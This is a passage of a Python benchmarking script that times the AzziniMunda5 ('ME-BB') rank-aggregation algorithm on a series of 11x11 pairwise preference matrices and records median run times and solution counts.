[0,23,29,30,28,29,21,34,29,17,26],
[28,0,26,25,28,30,26,30,28,26,23],
[22,25,0,25,28,24,20,32,31,20,26],
[21,26,26,0,23,22,27,32,29,28,24],
[23,23,23,28,0,27,20,32,27,24,26],
[22,21,27,29,24,0,28,32,32,21,22],
[30,25,31,24,31,23,0,33,33,25,28],
[17,21,19,19,19,19,18,0,26,19,21],
[22,23,20,22,24,19,18,25,0,17,25],
[34,25,31,23,27,30,26,32,34,0,27],
[25,28,25,27,25,29,23,30,26,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 106, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,27,22,29,31,29,24,24,21,20],
[20,0,25,22,28,26,22,23,20,23,18],
[24,26,0,23,33,28,25,27,23,22,24],
[29,29,28,0,27,24,27,28,26,26,29],
[22,23,18,24,0,23,21,22,22,18,14],
[20,25,23,27,28,0,24,21,24,25,17],
[22,29,26,24,30,27,0,25,25,24,24],
[27,28,24,23,29,30,26,0,25,25,21],
[27,31,28,25,29,27,26,26,0,24,26],
[30,28,29,25,33,26,27,26,27,0,31],
[31,33,27,22,37,34,27,30,25,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 107, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,25,23,31,25,27,30,20,29,20],
[23,0,22,25,31,21,20,22,28,34,25],
[26,29,0,21,23,21,30,27,21,29,20],
[28,26,30,0,25,17,22,21,19,25,28],
[20,20,28,26,0,14,21,28,24,23,19],
[26,30,30,34,37,0,25,33,27,34,33],
[24,31,21,29,30,26,0,30,30,28,29],
[21,29,24,30,23,18,21,0,27,32,29],
[31,23,30,32,27,24,21,24,0,22,26],
[22,17,22,26,28,17,23,19,29,0,22],
[31,26,31,23,32,18,22,22,25,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 108, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,27,21,23,22,20,26,21,25,21],
[24,0,30,22,23,26,22,28,27,26,24],
[24,21,0,22,18,24,16,23,25,26,24],
[30,29,29,0,30,26,23,30,32,29,23],
[28,28,33,21,0,26,25,37,30,27,27],
[29,25,27,25,25,0,28,29,33,32,23],
[31,29,35,28,26,23,0,30,28,28,24],
[25,23,28,21,14,22,21,0,22,27,17],
[30,24,26,19,21,18,23,29,0,27,22],
[26,25,25,22,24,19,23,24,24,0,25],
[30,27,27,28,24,28,27,34,29,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 109, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,15,23,21,24,13,31,26,21,32,16],
[36,0,35,30,35,26,36,30,31,40,23],
[28,16,0,31,30,16,31,24,29,37,28],
[30,21,20,0,23,23,37,30,29,38,21],
[27,16,21,28,0,13,26,23,22,30,18],
[38,25,35,28,38,0,37,30,29,37,21],
[20,15,20,14,25,14,0,20,18,32,11],
[25,21,27,21,28,21,31,0,24,36,24],
[30,20,22,22,29,22,33,27,0,36,22],
[19,11,14,13,21,14,19,15,15,0,5],
[35,28,23,30,33,30,40,27,29,46,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 110, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,33,31,24,26,30,28,28,29,26],
[26,0,28,30,26,28,25,29,23,28,22],
[18,23,0,24,21,25,23,23,21,24,22],
[20,21,27,0,25,28,23,24,25,22,20],
[27,25,30,26,0,29,26,25,24,27,23],
[25,23,26,23,22,0,22,30,24,25,19],
[21,26,28,28,25,29,0,30,27,29,26],
[23,22,28,27,26,21,21,0,21,25,21],
[23,28,30,26,27,27,24,30,0,26,25],
[22,23,27,29,24,26,22,26,25,0,21],
[25,29,29,31,28,32,25,30,26,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 111, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,32,25,33,22,23,42,27,37,34],
[23,0,24,26,28,15,25,32,25,27,27],
[19,27,0,17,24,13,20,34,21,27,27],
[26,25,34,0,27,26,27,36,19,32,34],
[18,23,27,24,0,14,20,30,19,26,31],
[29,36,38,25,37,0,34,45,31,34,32],
[28,26,31,24,31,17,0,41,24,36,37],
[9,19,17,15,21,6,10,0,13,19,28],
[24,26,30,32,32,20,27,38,0,41,40],
[14,24,24,19,25,17,15,32,10,0,31],
[17,24,24,17,20,19,14,23,11,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 112, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,26,23,31,36,35,33,36,33,36],
[26,0,32,31,22,34,34,24,28,26,30],
[25,19,0,25,21,35,37,29,21,25,37],
[28,20,26,0,28,36,22,12,28,20,36],
[20,29,30,23,0,24,26,22,24,32,24],
[15,17,16,15,27,0,37,19,24,25,28],
[16,17,14,29,25,14,0,12,20,16,26],
[18,27,22,39,29,32,39,0,32,37,30],
[15,23,30,23,27,27,31,19,0,27,28],
[18,25,26,31,19,26,35,14,24,0,20],
[15,21,14,15,27,23,25,21,23,31,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 113, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,21,30,22,22,31,25,26,26,34],
[24,0,25,26,23,19,28,27,22,23,26],
[30,26,0,25,26,22,28,21,25,27,29],
[21,25,26,0,26,28,33,27,23,28,34],
[29,28,25,25,0,24,28,20,26,29,30],
[29,32,29,23,27,0,34,30,20,27,32],
[20,23,23,18,23,17,0,24,20,25,23],
[26,24,30,24,31,21,27,0,24,32,29],
[25,29,26,28,25,31,31,27,0,26,31],
[25,28,24,23,22,24,26,19,25,0,26],
[17,25,22,17,21,19,28,22,20,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 114, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,23,27,20,24,22,25,22,26,28],
[22,0,22,24,26,23,23,17,23,24,22],
[28,29,0,29,27,27,28,28,24,30,33],
[24,27,22,0,29,24,25,23,21,29,30],
[31,25,24,22,0,23,19,24,25,24,24],
[27,28,24,27,28,0,26,18,20,23,30],
[29,28,23,26,32,25,0,22,31,28,32],
[26,34,23,28,27,33,29,0,31,28,31],
[29,28,27,30,26,31,20,20,0,25,32],
[25,27,21,22,27,28,23,23,26,0,32],
[23,29,18,21,27,21,19,20,19,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 115, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,16,27,23,27,17,25,23,26,29],
[23,0,25,30,37,29,24,28,26,25,28],
[35,26,0,27,26,28,26,23,25,32,25],
[24,21,24,0,32,29,19,27,19,27,24],
[28,14,25,19,0,22,9,24,18,19,22],
[24,22,23,22,29,0,17,21,22,24,21],
[34,27,25,32,42,34,0,29,28,37,32],
[26,23,28,24,27,30,22,0,20,27,19],
[28,25,26,32,33,29,23,31,0,27,23],
[25,26,19,24,32,27,14,24,24,0,19],
[22,23,26,27,29,30,19,32,28,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 116, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,21,19,21,21,29,28,26,24,22],
[25,0,20,19,20,19,25,21,21,17,17],
[30,31,0,27,22,21,29,32,30,26,24],
[32,32,24,0,30,26,30,28,34,29,28],
[30,31,29,21,0,23,29,24,25,29,27],
[30,32,30,25,28,0,31,33,29,30,25],
[22,26,22,21,22,20,0,26,26,27,25],
[23,30,19,23,27,18,25,0,25,24,22],
[25,30,21,17,26,22,25,26,0,25,26],
[27,34,25,22,22,21,24,27,26,0,21],
[29,34,27,23,24,26,26,29,25,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 117, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,18,30,18,26,25,7,21,16,47,12],
[33,0,34,22,30,33,29,15,24,29,22],
[21,17,0,16,30,27,17,32,27,41,26],
[33,29,35,0,30,39,29,25,35,35,22],
[25,21,21,21,0,25,21,16,21,21,22],
[26,18,24,12,26,0,21,21,42,47,12],
[44,22,34,22,30,30,0,25,39,51,21],
[30,36,19,26,35,30,26,0,42,42,31],
[35,27,24,16,30,9,12,9,0,31,12],
[4,22,10,16,30,4,0,9,20,0,16],
[39,29,25,29,29,39,30,20,39,35,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 118, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,13,38,47,21,29,41,38,41,41,46],
[38,0,42,47,39,21,45,43,34,46,50],
[13,9,0,47,1,25,25,31,42,30,41],
[4,4,4,0,4,20,12,26,20,12,37],
[30,12,50,47,0,33,45,34,46,29,45],
[22,30,26,31,18,0,29,27,42,30,45],
[10,6,26,39,6,22,0,27,34,22,38],
[13,8,20,25,17,24,24,0,25,13,41],
[10,17,9,31,5,9,17,26,0,17,50],
[10,5,21,39,22,21,29,38,34,0,38],
[5,1,10,14,6,6,13,10,1,13,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 119, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,19,22,24,25,26,25,23,25,30],
[27,0,20,21,17,25,23,21,21,26,21],
[32,31,0,26,28,26,29,23,26,28,29],
[29,30,25,0,24,27,30,25,25,26,30],
[27,34,23,27,0,25,23,23,21,29,29],
[26,26,25,24,26,0,24,22,20,27,31],
[25,28,22,21,28,27,0,28,25,26,27],
[26,30,28,26,28,29,23,0,24,27,30],
[28,30,25,26,30,31,26,27,0,26,28],
[26,25,23,25,22,24,25,24,25,0,23],
[21,30,22,21,22,20,24,21,23,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 120, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,25,38,28,37,27,31,34,40,30],
[20,0,28,29,25,17,24,22,25,31,30],
[26,23,0,27,17,25,20,26,17,30,28],
[13,22,24,0,14,19,22,30,31,32,24],
[23,26,34,37,0,26,24,30,36,31,22],
[14,34,26,32,25,0,27,18,28,33,25],
[24,27,31,29,27,24,0,28,23,34,33],
[20,29,25,21,21,33,23,0,23,29,21],
[17,26,34,20,15,23,28,28,0,27,32],
[11,20,21,19,20,18,17,22,24,0,32],
[21,21,23,27,29,26,18,30,19,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 121, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,18,8,8,12,16,17,10,8,26],
[27,0,21,18,18,28,18,14,25,19,28],
[33,30,0,19,21,23,21,25,22,21,34],
[43,33,32,0,19,25,25,24,16,27,30],
[43,33,30,32,0,31,21,28,22,32,27],
[39,23,28,26,20,0,22,27,26,14,29],
[35,33,30,26,30,29,0,24,27,26,27],
[34,37,26,27,23,24,27,0,22,23,32],
[41,26,29,35,29,25,24,29,0,18,36],
[43,32,30,24,19,37,25,28,33,0,33],
[25,23,17,21,24,22,24,19,15,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 122, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,36,24,20,29,23,32,33,8,27,22],
[15,0,22,14,29,19,12,29,17,19,19],
[27,29,0,13,24,37,29,29,22,32,26],
[31,37,38,0,30,29,30,29,38,37,19],
[22,22,27,21,0,32,24,29,22,32,27],
[28,32,14,22,19,0,25,20,22,26,27],
[19,39,22,21,27,26,0,27,22,30,27],
[18,22,22,22,22,31,24,0,17,16,17],
[43,34,29,13,29,29,29,34,0,37,31],
[24,32,19,14,19,25,21,35,14,0,19],
[29,32,25,32,24,24,24,34,20,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 123, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,23,35,25,30,39,32,26,25,28],
[24,0,29,37,30,36,37,25,28,30,33],
[28,22,0,34,32,32,34,36,33,33,33],
[16,14,17,0,17,19,30,20,23,24,19],
[26,21,19,34,0,28,32,25,26,24,26],
[21,15,19,32,23,0,29,23,27,25,25],
[12,14,17,21,19,22,0,21,26,18,17],
[19,26,15,31,26,28,30,0,28,21,24],
[25,23,18,28,25,24,25,23,0,25,27],
[26,21,18,27,27,26,33,30,26,0,27],
[23,18,18,32,25,26,34,27,24,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 124, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,22,32,27,18,21,26,35,32,32],
[32,0,27,40,26,20,27,29,32,29,31],
[29,24,0,38,26,29,25,28,35,27,33],
[19,11,13,0,26,14,18,16,27,25,17],
[24,25,25,25,0,16,23,25,29,30,22],
[33,31,22,37,35,0,29,32,29,33,27],
[30,24,26,33,28,22,0,25,35,28,31],
[25,22,23,35,26,19,26,0,26,31,23],
[16,19,16,24,22,22,16,25,0,23,19],
[19,22,24,26,21,18,23,20,28,0,22],
[19,20,18,34,29,24,20,28,32,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 125, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,23,27,29,25,26,21,21,30,26],
[28,0,28,29,30,25,31,25,29,34,28],
[28,23,0,26,27,23,26,20,21,30,22],
[24,22,25,0,29,28,23,26,27,26,25],
[22,21,24,22,0,27,31,24,24,28,24],
[26,26,28,23,24,0,30,30,23,32,29],
[25,20,25,28,20,21,0,24,26,28,23],
[30,26,31,25,27,21,27,0,23,28,24],
[30,22,30,24,27,28,25,28,0,27,30],
[21,17,21,25,23,19,23,23,24,0,22],
[25,23,29,26,27,22,28,27,21,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 126, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,27,24,27,31,30,28,27,30,28],
[28,0,24,27,28,35,34,31,26,31,30],
[24,27,0,23,27,28,29,30,26,31,23],
[27,24,28,0,26,29,40,33,28,31,31],
[24,23,24,25,0,28,31,27,24,28,24],
[20,16,23,22,23,0,29,26,21,28,25],
[21,17,22,11,20,22,0,23,21,26,22],
[23,20,21,18,24,25,28,0,21,26,24],
[24,25,25,23,27,30,30,30,0,30,31],
[21,20,20,20,23,23,25,25,21,0,22],
[23,21,28,20,27,26,29,27,20,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 127, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,27,27,27,31,27,20,29,23,21],
[19,0,14,18,21,22,16,16,19,14,24],
[24,37,0,22,27,32,31,27,29,32,16],
[24,33,29,0,26,29,27,29,28,33,29],
[24,30,24,25,0,26,23,20,24,23,25],
[20,29,19,22,25,0,25,13,17,16,21],
[24,35,20,24,28,26,0,24,27,27,22],
[31,35,24,22,31,38,27,0,30,28,23],
[22,32,22,23,27,34,24,21,0,24,21],
[28,37,19,18,28,35,24,23,27,0,23],
[30,27,35,22,26,30,29,28,30,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 128, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,16,22,23,12,35,16,22,16,32],
[20,0,10,20,11,4,33,16,22,27,27],
[35,41,0,35,21,11,40,21,14,35,49],
[29,31,16,0,23,13,24,5,17,16,29],
[28,40,30,28,0,11,33,14,20,35,35],
[39,47,40,38,40,0,30,24,28,27,40],
[16,18,11,27,18,21,0,14,11,17,18],
[35,35,30,46,37,27,37,0,41,21,35],
[29,29,37,34,31,23,40,10,0,23,37],
[35,24,16,35,16,24,34,30,28,0,34],
[19,24,2,22,16,11,33,16,14,17,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 129, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,30,18,22,31,19,23,29,28,25],
[25,0,30,22,20,30,24,26,28,28,23],
[21,21,0,14,21,27,18,19,17,22,23],
[33,29,37,0,26,35,20,25,30,35,31],
[29,31,30,25,0,36,25,25,28,32,29],
[20,21,24,16,15,0,17,15,17,26,19],
[32,27,33,31,26,34,0,26,25,27,32],
[28,25,32,26,26,36,25,0,24,29,31],
[22,23,34,21,23,34,26,27,0,31,26],
[23,23,29,16,19,25,24,22,20,0,23],
[26,28,28,20,22,32,19,20,25,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 130, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,23,22,25,29,28,27,32,31,27],
[29,0,28,26,21,34,25,23,30,31,25],
[28,23,0,23,20,29,29,25,23,30,27],
[29,25,28,0,27,29,27,28,30,29,27],
[26,30,31,24,0,34,31,27,26,36,28],
[22,17,22,22,17,0,20,18,26,26,24],
[23,26,22,24,20,31,0,20,30,23,28],
[24,28,26,23,24,33,31,0,29,31,25],
[19,21,28,21,25,25,21,22,0,30,18],
[20,20,21,22,15,25,28,20,21,0,22],
[24,26,24,24,23,27,23,26,33,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 131, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,18,22,20,31,13,15,24,24,24],
[30,0,18,21,28,34,19,27,19,28,30],
[33,33,0,24,31,39,29,33,34,36,34],
[29,30,27,0,28,30,12,26,26,33,28],
[31,23,20,23,0,24,21,17,25,23,26],
[20,17,12,21,27,0,17,19,27,25,24],
[38,32,22,39,30,34,0,31,35,36,26],
[36,24,18,25,34,32,20,0,27,34,22],
[27,32,17,25,26,24,16,24,0,30,28],
[27,23,15,18,28,26,15,17,21,0,24],
[27,21,17,23,25,27,25,29,23,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 132, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,28,22,27,21,23,30,19,21,18],
[20,0,27,17,25,15,19,40,17,26,25],
[23,24,0,17,35,16,18,31,21,29,17],
[29,34,34,0,34,19,25,35,19,35,26],
[24,26,16,17,0,20,24,25,22,26,22],
[30,36,35,32,31,0,25,34,25,33,26],
[28,32,33,26,27,26,0,33,30,36,24],
[21,11,20,16,26,17,18,0,17,21,11],
[32,34,30,32,29,26,21,34,0,29,23],
[30,25,22,16,25,18,15,30,22,0,17],
[33,26,34,25,29,25,27,40,28,34,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 133, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,42,40,26,42,31,20,29,24,26,30],
[9,0,25,5,18,9,16,27,18,20,18],
[11,26,0,13,33,27,31,21,22,24,18],
[25,46,38,0,30,32,22,38,31,29,34],
[9,33,18,21,0,10,9,25,24,18,21],
[20,42,24,19,41,0,21,24,35,23,31],
[31,35,20,29,42,30,0,29,32,23,38],
[22,24,30,13,26,27,22,0,29,24,29],
[27,33,29,20,27,16,19,22,0,19,21],
[25,31,27,22,33,28,28,27,32,0,25],
[21,33,33,17,30,20,13,22,30,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 134, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,34,25,29,33,37,35,40,23,40,24],
[17,0,19,25,24,30,34,36,12,33,27],
[26,32,0,25,34,36,31,42,26,35,24],
[22,26,26,0,22,36,31,37,25,30,21],
[18,27,17,29,0,33,38,33,20,31,18],
[14,21,15,15,18,0,20,28,19,25,17],
[16,17,20,20,13,31,0,21,15,29,15],
[11,15,9,14,18,23,30,0,9,23,10],
[28,39,25,26,31,32,36,42,0,42,32],
[11,18,16,21,20,26,22,28,9,0,16],
[27,24,27,30,33,34,36,41,19,35,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 135, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,23,27,23,27,24,28,20,22,20],
[26,0,17,24,24,24,23,28,17,20,15],
[28,34,0,29,24,29,28,32,26,25,23],
[24,27,22,0,21,30,28,31,23,25,26],
[28,27,27,30,0,30,29,30,25,29,26],
[24,27,22,21,21,0,26,27,24,21,21],
[27,28,23,23,22,25,0,27,23,22,20],
[23,23,19,20,21,24,24,0,19,16,14],
[31,34,25,28,26,27,28,32,0,29,25],
[29,31,26,26,22,30,29,35,22,0,21],
[31,36,28,25,25,30,31,37,26,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 136, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
